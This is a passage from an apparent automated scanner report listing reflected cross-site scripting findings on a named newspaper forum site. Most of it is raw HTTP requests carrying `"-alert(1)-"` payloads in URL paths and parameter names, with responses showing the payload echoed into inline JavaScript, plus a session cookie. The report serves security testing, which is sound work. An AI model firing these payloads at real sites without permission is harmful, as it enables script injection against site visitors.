GET /topic/al-qaida-is-us-puppet?83c90"-alert(1)-"f57460e9cf9=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:07:09 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 98974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
f (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/al-qaida-is-us-puppet?83c90"-alert(1)-"f57460e9cf9=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.100. http://forums.mercurynews.com/topic/bp-oil-spill-was-created-to-push-war-on-iran [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/bp-oil-spill-was-created-to-push-war-on-iran

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d738f"-alert(1)-"6fbedbd10eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topicd738f"-alert(1)-"6fbedbd10eb/bp-oil-spill-was-created-to-push-war-on-iran HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:12 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:36 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
anguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topicd738f"-alert(1)-"6fbedbd10eb/bp-oil-spill-was-created-to-push-war-on-iran";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURC
...[SNIP]...

3.101. http://forums.mercurynews.com/topic/bp-oil-spill-was-created-to-push-war-on-iran [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/bp-oil-spill-was-created-to-push-war-on-iran

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e2ed"-alert(1)-"68b78d5cb8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/bp-oil-spill-was-created-to-push-war-on-iran1e2ed"-alert(1)-"68b78d5cb8c HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:21 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:45 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
ned') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/bp-oil-spill-was-created-to-push-war-on-iran1e2ed"-alert(1)-"68b78d5cb8c";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.102. http://forums.mercurynews.com/topic/bp-oil-spill-was-created-to-push-war-on-iran [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/bp-oil-spill-was-created-to-push-war-on-iran

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbc8e"-alert(1)-"7edf3fe785f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/bp-oil-spill-was-created-to-push-war-on-iran?dbc8e"-alert(1)-"7edf3fe785f=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:07:00 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 32485

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
ed') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/bp-oil-spill-was-created-to-push-war-on-iran?dbc8e"-alert(1)-"7edf3fe785f=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.103. http://forums.mercurynews.com/topic/ferret-theory-lv [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/ferret-theory-lv

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e534b"-alert(1)-"d6330c89b46 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topice534b"-alert(1)-"d6330c89b46/ferret-theory-lv HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:02 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:26 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
anguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topice534b"-alert(1)-"d6330c89b46/ferret-theory-lv";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s
...[SNIP]...

3.104. http://forums.mercurynews.com/topic/ferret-theory-lv [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/ferret-theory-lv

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf2d6"-alert(1)-"4e7735b0a0d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/ferret-theory-lvcf2d6"-alert(1)-"4e7735b0a0d HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:12 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:36 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
pt">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/ferret-theory-lvcf2d6"-alert(1)-"4e7735b0a0d";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.105. http://forums.mercurynews.com/topic/ferret-theory-lv [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/ferret-theory-lv

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7fe24"-alert(1)-"022a6eab7a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/ferret-theory-lv?7fe24"-alert(1)-"022a6eab7a3=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:06:51 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
t">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/ferret-theory-lv?7fe24"-alert(1)-"022a6eab7a3=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.106. http://forums.mercurynews.com/topic/oil-and-iran-war [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/oil-and-iran-war

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2deab"-alert(1)-"4a706fc981a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic2deab"-alert(1)-"4a706fc981a/oil-and-iran-war HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:14 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:38 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
anguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic2deab"-alert(1)-"4a706fc981a/oil-and-iran-war";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s
...[SNIP]...

3.107. http://forums.mercurynews.com/topic/oil-and-iran-war [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/oil-and-iran-war

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96781"-alert(1)-"1dccca72dc8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/oil-and-iran-war96781"-alert(1)-"1dccca72dc8 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:29 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:53 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
pt">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/oil-and-iran-war96781"-alert(1)-"1dccca72dc8";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.108. http://forums.mercurynews.com/topic/oil-and-iran-war [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/oil-and-iran-war

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 195d3"-alert(1)-"bbdb9078104 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/oil-and-iran-war?195d3"-alert(1)-"bbdb9078104=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:07:01 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:25 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
t">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/oil-and-iran-war?195d3"-alert(1)-"bbdb9078104=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.109. http://forums.mercurynews.com/topic/oil-price-and-iran-war [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/oil-price-and-iran-war

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bdef6"-alert(1)-"abaffde0a85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topicbdef6"-alert(1)-"abaffde0a85/oil-price-and-iran-war HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:09 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22134

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
anguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topicbdef6"-alert(1)-"abaffde0a85/oil-price-and-iran-war";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageNa
...[SNIP]...

3.110. http://forums.mercurynews.com/topic/oil-price-and-iran-war [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/oil-price-and-iran-war

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7b93"-alert(1)-"c1260fb02e0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/oil-price-and-iran-warb7b93"-alert(1)-"c1260fb02e0 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:14 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:38 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22134

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
f (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/oil-price-and-iran-warb7b93"-alert(1)-"c1260fb02e0";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.111. http://forums.mercurynews.com/topic/oil-price-and-iran-war [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
